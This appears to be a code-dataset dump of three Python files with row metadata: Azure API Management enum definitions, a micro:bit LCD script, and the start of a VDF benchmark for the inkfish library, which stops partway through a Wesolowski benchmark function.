"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum
from six import with_metaclass
from azure.core import CaseInsensitiveEnumMeta
class AccessIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
ACCESS = "access"
GIT_ACCESS = "gitAccess"
class AccessType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of access to be used for the storage account.
"""
#: Use access key.
ACCESS_KEY = "AccessKey"
#: Use system assigned managed identity.
SYSTEM_ASSIGNED_MANAGED_IDENTITY = "SystemAssignedManagedIdentity"
#: Use user assigned managed identity.
USER_ASSIGNED_MANAGED_IDENTITY = "UserAssignedManagedIdentity"
class AlwaysLog(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies for what type of messages sampling settings should not apply.
"""
#: Always log all erroneous request regardless of sampling settings.
ALL_ERRORS = "allErrors"
class ApiManagementSkuCapacityScaleType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The scale type applicable to the sku.
"""
AUTOMATIC = "Automatic"
MANUAL = "Manual"
NONE = "None"
class ApiManagementSkuRestrictionsReasonCode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The reason for restriction.
"""
QUOTA_ID = "QuotaId"
NOT_AVAILABLE_FOR_SUBSCRIPTION = "NotAvailableForSubscription"
class ApiManagementSkuRestrictionsType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of restrictions.
"""
LOCATION = "Location"
ZONE = "Zone"
class ApimIdentityType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity used for the resource. The type 'SystemAssigned, UserAssigned' includes
both an implicitly created identity and a set of user assigned identities. The type 'None' will
remove any identities from the service.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
NONE = "None"
class ApiType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Type of API.
"""
HTTP = "http"
SOAP = "soap"
WEBSOCKET = "websocket"
GRAPHQL = "graphql"
class ApiVersionSetContractDetailsVersioningScheme(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""An value that determines where the API Version identifier will be located in a HTTP request.
"""
SEGMENT = "Segment"
QUERY = "Query"
HEADER = "Header"
class AppType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: User create request was sent by legacy developer portal.
PORTAL = "portal"
#: User create request was sent by new developer portal.
DEVELOPER_PORTAL = "developerPortal"
class AsyncOperationStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of an async operation.
"""
STARTED = "Started"
IN_PROGRESS = "InProgress"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class AuthorizationMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
HEAD = "HEAD"
OPTIONS = "OPTIONS"
TRACE = "TRACE"
GET = "GET"
POST = "POST"
PUT = "PUT"
PATCH = "PATCH"
DELETE = "DELETE"
class BackendProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Backend communication protocol.
"""
#: The Backend is a RESTful service.
HTTP = "http"
#: The Backend is a SOAP service.
SOAP = "soap"
class BearerTokenSendingMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
AUTHORIZATION_HEADER = "authorizationHeader"
QUERY = "query"
class BearerTokenSendingMethods(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Form of an authorization grant, which the client uses to request the access token.
"""
#: Access token will be transmitted in the Authorization header using Bearer schema.
AUTHORIZATION_HEADER = "authorizationHeader"
#: Access token will be transmitted as query parameters.
QUERY = "query"
class CertificateConfigurationStoreName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The System.Security.Cryptography.x509certificates.StoreName certificate store location. Only
Root and CertificateAuthority are valid locations.
"""
CERTIFICATE_AUTHORITY = "CertificateAuthority"
ROOT = "Root"
class CertificateSource(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Certificate Source.
"""
MANAGED = "Managed"
KEY_VAULT = "KeyVault"
CUSTOM = "Custom"
BUILT_IN = "BuiltIn"
class CertificateStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Certificate Status.
"""
COMPLETED = "Completed"
FAILED = "Failed"
IN_PROGRESS = "InProgress"
class ClientAuthenticationMethod(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Basic Client Authentication method.
BASIC = "Basic"
#: Body based Authentication method.
BODY = "Body"
class ConfigurationIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
CONFIGURATION = "configuration"
class Confirmation(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Determines the type of confirmation e-mail that will be sent to the newly created user.
"""
#: Send an e-mail to the user confirming they have successfully signed up.
SIGNUP = "signup"
#: Send an e-mail inviting the user to sign-up and complete registration.
INVITE = "invite"
class ConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The connection status.
"""
UNKNOWN = "Unknown"
CONNECTED = "Connected"
DISCONNECTED = "Disconnected"
DEGRADED = "Degraded"
class ConnectivityCheckProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The request's protocol. Specific protocol configuration can be available based on this
selection. The specified destination address must be coherent with this value.
"""
TCP = "TCP"
HTTP = "HTTP"
HTTPS = "HTTPS"
class ConnectivityStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Resource Connectivity Status Type identifier.
"""
INITIALIZING = "initializing"
SUCCESS = "success"
FAILURE = "failure"
class ContentFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format of the Content in which the API is getting imported.
"""
#: The contents are inline and Content type is a WADL document.
WADL_XML = "wadl-xml"
#: The WADL document is hosted on a publicly accessible internet address.
WADL_LINK_JSON = "wadl-link-json"
#: The contents are inline and Content Type is a OpenAPI 2.0 JSON Document.
SWAGGER_JSON = "swagger-json"
#: The OpenAPI 2.0 JSON document is hosted on a publicly accessible internet address.
SWAGGER_LINK_JSON = "swagger-link-json"
#: The contents are inline and the document is a WSDL/Soap document.
WSDL = "wsdl"
#: The WSDL document is hosted on a publicly accessible internet address.
WSDL_LINK = "wsdl-link"
#: The contents are inline and Content Type is a OpenAPI 3.0 YAML Document.
OPENAPI = "openapi"
#: The contents are inline and Content Type is a OpenAPI 3.0 JSON Document.
OPENAPI_JSON = "openapi+json"
#: The OpenAPI 3.0 YAML document is hosted on a publicly accessible internet address.
OPENAPI_LINK = "openapi-link"
#: The OpenAPI 3.0 JSON document is hosted on a publicly accessible internet address.
OPENAPI_JSON_LINK = "openapi+json-link"
#: The GraphQL API endpoint hosted on a publicly accessible internet address.
GRAPHQL_LINK = "graphql-link"
class CreatedByType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity that created the resource.
"""
USER = "User"
APPLICATION = "Application"
MANAGED_IDENTITY = "ManagedIdentity"
KEY = "Key"
class DataMaskingMode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Data masking mode.
"""
#: Mask the value of an entity.
MASK = "Mask"
#: Hide the presence of an entity.
HIDE = "Hide"
class ExportApi(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
TRUE = "true"
class ExportFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Export the Api Definition in OpenAPI 2.0 Specification as JSON document to the Storage Blob.
SWAGGER = "swagger-link"
#: Export the Api Definition in WSDL Schema to Storage Blob. This is only supported for APIs of
#: Type ``soap``.
WSDL = "wsdl-link"
#: Export the Api Definition in WADL Schema to Storage Blob.
WADL = "wadl-link"
#: Export the Api Definition in OpenAPI 3.0 Specification as YAML document to Storage Blob.
OPENAPI = "openapi-link"
#: Export the Api Definition in OpenAPI 3.0 Specification as JSON document to Storage Blob.
OPENAPI_JSON = "openapi+json-link"
class ExportResultFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format in which the API Details are exported to the Storage Blob with Sas Key valid for 5
minutes.
"""
#: The API Definition is exported in OpenAPI Specification 2.0 format to the Storage Blob.
SWAGGER = "swagger-link-json"
#: The API Definition is exported in WSDL Schema to Storage Blob. This is only supported for APIs
#: of Type ``soap``.
WSDL = "wsdl-link+xml"
#: Export the API Definition in WADL Schema to Storage Blob.
WADL = "wadl-link-json"
#: Export the API Definition in OpenAPI Specification 3.0 to Storage Blob.
OPEN_API = "openapi-link"
class GrantType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Authorization Code Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.1.
AUTHORIZATION_CODE = "authorizationCode"
#: Implicit Code Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.2.
IMPLICIT = "implicit"
#: Resource Owner Password Grant flow as described
#: https://tools.ietf.org/html/rfc6749#section-4.3.
RESOURCE_OWNER_PASSWORD = "resourceOwnerPassword"
#: Client Credentials Grant flow as described https://tools.ietf.org/html/rfc6749#section-4.4.
CLIENT_CREDENTIALS = "clientCredentials"
class GroupType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Group type.
"""
CUSTOM = "custom"
SYSTEM = "system"
EXTERNAL = "external"
class HostnameType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Hostname type.
"""
PROXY = "Proxy"
PORTAL = "Portal"
MANAGEMENT = "Management"
SCM = "Scm"
DEVELOPER_PORTAL = "DeveloperPortal"
class HttpCorrelationProtocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Sets correlation protocol to use for Application Insights diagnostics.
"""
#: Do not read and inject correlation headers.
NONE = "None"
#: Inject Request-Id and Request-Context headers with request correlation data. See
#: https://github.com/dotnet/corefx/blob/master/src/System.Diagnostics.DiagnosticSource/src/HttpCorrelationProtocol.md.
LEGACY = "Legacy"
#: Inject Trace Context headers. See https://w3c.github.io/trace-context.
W3_C = "W3C"
class IdentityProviderType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: Facebook as Identity provider.
FACEBOOK = "facebook"
#: Google as Identity provider.
GOOGLE = "google"
#: Microsoft Live as Identity provider.
MICROSOFT = "microsoft"
#: Twitter as Identity provider.
TWITTER = "twitter"
#: Azure Active Directory as Identity provider.
AAD = "aad"
#: Azure Active Directory B2C as Identity provider.
AAD_B2_C = "aadB2C"
class IssueType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of issue.
"""
UNKNOWN = "Unknown"
AGENT_STOPPED = "AgentStopped"
GUEST_FIREWALL = "GuestFirewall"
DNS_RESOLUTION = "DnsResolution"
SOCKET_BIND = "SocketBind"
NETWORK_SECURITY_RULE = "NetworkSecurityRule"
USER_DEFINED_ROUTE = "UserDefinedRoute"
PORT_THROTTLED = "PortThrottled"
PLATFORM = "Platform"
class KeyType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The Key to be used to generate token for user.
"""
PRIMARY = "primary"
SECONDARY = "secondary"
class LoggerType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Logger type.
"""
#: Azure Event Hub as log destination.
AZURE_EVENT_HUB = "azureEventHub"
#: Azure Application Insights as log destination.
APPLICATION_INSIGHTS = "applicationInsights"
#: Azure Monitor.
AZURE_MONITOR = "azureMonitor"
class Method(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The HTTP method to be used.
"""
GET = "GET"
POST = "POST"
class NameAvailabilityReason(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Invalid indicates the name provided does not match the resource provider’s naming requirements
(incorrect length, unsupported characters, etc.) AlreadyExists indicates that the name is
already in use and is therefore unavailable.
"""
VALID = "Valid"
INVALID = "Invalid"
ALREADY_EXISTS = "AlreadyExists"
class NotificationName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: The following email recipients and users will receive email notifications about subscription
#: requests for API products requiring approval.
REQUEST_PUBLISHER_NOTIFICATION_MESSAGE = "RequestPublisherNotificationMessage"
#: The following email recipients and users will receive email notifications about new API product
#: subscriptions.
PURCHASE_PUBLISHER_NOTIFICATION_MESSAGE = "PurchasePublisherNotificationMessage"
#: The following email recipients and users will receive email notifications when new applications
#: are submitted to the application gallery.
NEW_APPLICATION_NOTIFICATION_MESSAGE = "NewApplicationNotificationMessage"
#: The following recipients will receive blind carbon copies of all emails sent to developers.
BCC = "BCC"
#: The following email recipients and users will receive email notifications when a new issue or
#: comment is submitted on the developer portal.
NEW_ISSUE_PUBLISHER_NOTIFICATION_MESSAGE = "NewIssuePublisherNotificationMessage"
#: The following email recipients and users will receive email notifications when developer closes
#: his account.
ACCOUNT_CLOSED_PUBLISHER = "AccountClosedPublisher"
#: The following email recipients and users will receive email notifications when subscription
#: usage gets close to usage quota.
QUOTA_LIMIT_APPROACHING_PUBLISHER_NOTIFICATION_MESSAGE = "QuotaLimitApproachingPublisherNotificationMessage"
class OperationNameFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The format of the Operation Name for Application Insights telemetries. Default is Name.
"""
#: API_NAME;rev=API_REVISION - OPERATION_NAME.
NAME = "Name"
#: HTTP_VERB URL.
URL = "Url"
class Origin(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The origin of the issue.
"""
LOCAL = "Local"
INBOUND = "Inbound"
OUTBOUND = "Outbound"
class PlatformVersion(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Compute Platform Version running the service.
"""
#: Platform version cannot be determined, as compute platform is not deployed.
UNDETERMINED = "undetermined"
#: Platform running the service on Single Tenant V1 platform.
STV1 = "stv1"
#: Platform running the service on Single Tenant V2 platform.
STV2 = "stv2"
#: Platform running the service on Multi Tenant V1 platform.
MTV1 = "mtv1"
class PolicyContentFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Format of the policyContent.
"""
#: The contents are inline and Content type is an XML document.
XML = "xml"
#: The policy XML document is hosted on a http endpoint accessible from the API Management
#: service.
XML_LINK = "xml-link"
#: The contents are inline and Content type is a non XML encoded policy document.
RAWXML = "rawxml"
#: The policy document is not Xml encoded and is hosted on a http endpoint accessible from the API
#: Management service.
RAWXML_LINK = "rawxml-link"
class PolicyExportFormat(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
#: The contents are inline and Content type is an XML document.
XML = "xml"
#: The contents are inline and Content type is a non XML encoded policy document.
RAWXML = "rawxml"
class PolicyIdName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
POLICY = "policy"
class PolicyScopeContract(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
TENANT = "Tenant"
PRODUCT = "Product"
API = "Api"
OPERATION = "Operation"
ALL = "All"
class PortalRevisionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of the portal's revision.
"""
#: Portal's revision has been queued.
PENDING = "pending"
#: Portal's revision is being published.
PUBLISHING = "publishing"
#: Portal's revision publishing completed.
COMPLETED = "completed"
#: Portal's revision publishing failed.
FAILED = "failed"
class PreferredIPVersion(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The IP version to be used. Only IPv4 is supported for now.
"""
I_PV4 = "IPv4"
class PrivateEndpointConnectionProvisioningState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The current provisioning state.
"""
SUCCEEDED = "Succeeded"
CREATING = "Creating"
DELETING = "Deleting"
FAILED = "Failed"
class PrivateEndpointServiceConnectionStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The private endpoint connection status.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class ProductState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""whether product is published or not. Published products are discoverable by users of developer
portal. Non published products are visible only to administrators. Default state of Product is
notPublished.
"""
NOT_PUBLISHED = "notPublished"
PUBLISHED = "published"
class Protocol(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
HTTP = "http"
HTTPS = "https"
WS = "ws"
WSS = "wss"
class PublicNetworkAccess(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Whether or not public endpoint access is allowed for this API Management service. Value is
optional but if passed in, must be 'Enabled' or 'Disabled'. If 'Disabled', private endpoints
are the exclusive access method. Default value is 'Enabled'
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class ResourceSkuCapacityScaleType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The scale type applicable to the sku.
"""
#: Supported scale type automatic.
AUTOMATIC = "automatic"
#: Supported scale type manual.
MANUAL = "manual"
#: Scaling not supported.
NONE = "none"
class SamplingType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Sampling type.
"""
#: Fixed-rate sampling.
FIXED = "fixed"
class SchemaType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Schema Type. Immutable.
"""
#: Xml schema type.
XML = "xml"
#: Json schema type.
JSON = "json"
class SettingsTypeName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
PUBLIC = "public"
class Severity(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The severity of the issue.
"""
ERROR = "Error"
WARNING = "Warning"
class SkuType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the Sku.
"""
#: Developer SKU of Api Management.
DEVELOPER = "Developer"
#: Standard SKU of Api Management.
STANDARD = "Standard"
#: Premium SKU of Api Management.
PREMIUM = "Premium"
#: Basic SKU of Api Management.
BASIC = "Basic"
#: Consumption SKU of Api Management.
CONSUMPTION = "Consumption"
#: Isolated SKU of Api Management.
ISOLATED = "Isolated"
class SoapApiType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Type of API to create.
* ``http`` creates a REST API
* ``soap`` creates a SOAP pass-through API
* ``websocket`` creates websocket API
* ``graphql`` creates GraphQL API.
"""
#: Imports a SOAP API having a RESTful front end.
SOAP_TO_REST = "http"
#: Imports the SOAP API having a SOAP front end.
SOAP_PASS_THROUGH = "soap"
#: Imports the API having a Websocket front end.
WEB_SOCKET = "websocket"
#: Imports the API having a GraphQL front end.
GRAPH_QL = "graphql"
class State(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Status of the issue.
"""
#: The issue is proposed.
PROPOSED = "proposed"
#: The issue is opened.
OPEN = "open"
#: The issue was removed.
REMOVED = "removed"
#: The issue is now resolved.
RESOLVED = "resolved"
#: The issue was closed.
CLOSED = "closed"
class SubscriptionState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Subscription state. Possible states are * active – the subscription is active, * suspended –
the subscription is blocked, and the subscriber cannot call any APIs of the product, *
submitted – the subscription request has been made by the developer, but has not yet been
approved or rejected, * rejected – the subscription request has been denied by an
administrator, * cancelled – the subscription has been cancelled by the developer or
administrator, * expired – the subscription reached its expiration date and was deactivated.
"""
SUSPENDED = "suspended"
ACTIVE = "active"
EXPIRED = "expired"
SUBMITTED = "submitted"
REJECTED = "rejected"
CANCELLED = "cancelled"
class TemplateName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
APPLICATION_APPROVED_NOTIFICATION_MESSAGE = "applicationApprovedNotificationMessage"
ACCOUNT_CLOSED_DEVELOPER = "accountClosedDeveloper"
QUOTA_LIMIT_APPROACHING_DEVELOPER_NOTIFICATION_MESSAGE = "quotaLimitApproachingDeveloperNotificationMessage"
NEW_DEVELOPER_NOTIFICATION_MESSAGE = "newDeveloperNotificationMessage"
EMAIL_CHANGE_IDENTITY_DEFAULT = "emailChangeIdentityDefault"
INVITE_USER_NOTIFICATION_MESSAGE = "inviteUserNotificationMessage"
NEW_COMMENT_NOTIFICATION_MESSAGE = "newCommentNotificationMessage"
CONFIRM_SIGN_UP_IDENTITY_DEFAULT = "confirmSignUpIdentityDefault"
NEW_ISSUE_NOTIFICATION_MESSAGE = "newIssueNotificationMessage"
PURCHASE_DEVELOPER_NOTIFICATION_MESSAGE = "purchaseDeveloperNotificationMessage"
PASSWORD_RESET_IDENTITY_DEFAULT = "passwordResetIdentityDefault"
PASSWORD_RESET_BY_ADMIN_NOTIFICATION_MESSAGE = "passwordResetByAdminNotificationMessage"
REJECT_DEVELOPER_NOTIFICATION_MESSAGE = "rejectDeveloperNotificationMessage"
REQUEST_DEVELOPER_NOTIFICATION_MESSAGE = "requestDeveloperNotificationMessage"
class UserState(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""Account state. Specifies whether the user is active or not. Blocked users are unable to sign
into the developer portal or call any APIs of subscribed products. Default state is Active.
"""
#: User state is active.
ACTIVE = "active"
#: User is blocked. Blocked users cannot authenticate at developer portal or call API.
BLOCKED = "blocked"
#: User account is pending. Requires identity confirmation before it can be made active.
PENDING = "pending"
#: User account is closed. All identities and related entities are removed.
DELETED = "deleted"
class Verbosity(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The verbosity level applied to traces emitted by trace policies.
"""
#: All the traces emitted by trace policies will be sent to the logger attached to this diagnostic
#: instance.
VERBOSE = "verbose"
#: Traces with 'severity' set to 'information' and 'error' will be sent to the logger attached to
#: this diagnostic instance.
INFORMATION = "information"
#: Only traces with 'severity' set to 'error' will be sent to the logger attached to this
#: diagnostic instance.
ERROR = "error"
class VersioningScheme(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""An value that determines where the API Version identifier will be located in a HTTP request.
"""
#: The API Version is passed in a path segment.
SEGMENT = "Segment"
#: The API Version is passed in a query parameter.
QUERY = "Query"
#: The API Version is passed in a HTTP header.
HEADER = "Header"
class VirtualNetworkType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)):
"""The type of VPN in which API Management service needs to be configured in. None (Default Value)
means the API Management service is not part of any Virtual Network, External means the API
Management deployment is set up inside a Virtual Network having an Internet Facing Endpoint,
and Internal means that API Management deployment is setup inside a Virtual Network having an
Intranet Facing Endpoint only.
"""
#: The service is not part of any Virtual Network.
NONE = "None"
#: The service is part of Virtual Network and it is accessible from Internet.
EXTERNAL = "External"
#: The service is part of Virtual Network and it is only accessible from within the virtual
#: network.
INTERNAL = "Internal"
| 36.536313
| 123
| 0.718425
| 25,467
| 0.972988
| 0
| 0
| 0
| 0
| 0
| 0
| 15,275
| 0.583594
|
b197033d00037d8ccf26822dfa92949370b97250
| 308
|
py
|
Python
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | 2
|
2020-11-23T20:27:03.000Z
|
2021-11-04T12:08:10.000Z
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | 1
|
2021-12-14T10:47:00.000Z
|
2021-12-14T12:02:08.000Z
|
lcd_rom_small.py
|
rhubarbdog/microbit-LCD-driver
|
d1a7f5cf3c4cfe825da873ae1a25b5765fe8ca3e
|
[
"MIT"
] | null | null | null |
from microbit import *
import microbit_i2c_lcd as lcd
i2c.init(sda=pin15,scl=pin13)
display = lcd.lcd(i2c)
display.lcd_display_string(str(chr(247)), 1)
print("this will display a pi symbol for ROM A00 japaneese\n"+\
"display a divide symbol for the A02 ROM european")
i2c.init(sda=pin20,scl=pin19)
| 23.692308
| 63
| 0.746753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 105
| 0.340909
|
b19975a6c0f70cdf1b6594a54b946673ec51a754
| 11,349
|
py
|
Python
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 97
|
2018-10-04T18:10:42.000Z
|
2021-08-23T10:37:06.000Z
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 4
|
2018-10-04T18:20:49.000Z
|
2021-05-03T07:13:14.000Z
|
benchmarks/benchmarks.py
|
alanefl/vdf-competition
|
84efc3aec180c43582c9421c6fb7fb2e22000635
|
[
"Apache-2.0"
] | 17
|
2018-10-08T18:08:21.000Z
|
2022-01-12T00:54:32.000Z
|
import time
import textwrap
import math
import binascii
from inkfish.create_discriminant import create_discriminant
from inkfish.classgroup import ClassGroup
from inkfish.iterate_squarings import iterate_squarings
from inkfish import proof_wesolowski
from inkfish.proof_of_time import (create_proof_of_time_nwesolowski,
check_proof_of_time_nwesolowski,
generate_r_value)
from inkfish import proof_pietrzak
from tests.int_mod_n import int_mod_n
start_t = 0
time_multiplier = 1000 # Use milliseconds
def start_bench():
global start_t
start_t = time.time() * time_multiplier
def end_bench(name, iterations):
global start_t
print("%-80s" % name, round(((time.time() * time_multiplier) - start_t)
/ (iterations), 2), "ms")
def bench_classgroup():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 512 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 512 bit square", 10000)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 1024 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 1024 bit square", 10000)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 2048 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 2048 bit square", 10000)
def bench_discriminant_generation():
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 512)
end_bench("Generate 512 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 1024)
end_bench("Generate 1024 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 2048)
end_bench("Generate 2048 bit discriminant", 100)
def bench_vdf_iterations():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(10):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 512bit classgroup", 10)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 1024bit classgroup", 2)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 2048bit classgroup", 2)
# 2048 bit modulus
prime = int(''.join(textwrap.dedent("""
2634427397878110232503205795695468045251992992603340168049253044454387
1080897872360133472596339100961569230393163880927301060812730934043766
3646941725034559080490451986171041751558689035115943134790395616490035
9846986660803055891526943083539429058955074960014718229954545667371414
8029627597753998530121193913181474174423003742206534823264658175666814
0135440982296559552013264268674093709650866928458407571602481922443634
2306826340229149641664159565679297958087282612514993965471602016939198
7906354607787482381087158402527243744342654041944357821920600344804411
149211019651477131981627171025001255607692340155184929729""").split(
"\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 2048bit RSA modulus", 2)
# 4096 bit modulus
prime = int(''.join(textwrap.dedent("""
8466908771297228398108729385413406312941234872779790501232479567685076
4762372651919166693555570188656362906279057098994287649807661604067499
3053172889374223358861501556862285892231110003666671700028271837785598
2711897721600334848186874197010418494909265899320941516493102418008649
1453168421248338831347183727052419170386543046753155080120058844782449
2367606252473029574371603403502901208633055707823115620627698680602710
8443465519855901353485395338769455628849759950055397510380800451786140
7656499749760023191493764704430968335226478156774628814806959050849093
5035645687560103462845054697907307302184358040130405297282437884344166
7188530230135000709764482573583664708281017375197388209508666190855611
3020636147999796942848529907410787587958203267319164458728792653638371
7065019972034334447374200594285558460255762459285837794285154075321806
4811493971019446075650166775528463987738853022894781860563097254152754
1001763544907553312158598519824602240430350073539728131177239628816329
0179188493240741373702361870220590386302554494325819514615309801491107
2710093592877658471507118356670261129465668437063636041245619411937902
0658733974883998301959084381087966405508661151837877497650143949507846
1522640311670422105209760172585337397687461""").split("\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 4096bit RSA modulus", 2)
def bench_wesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
powers_to_calculate += [iterations]
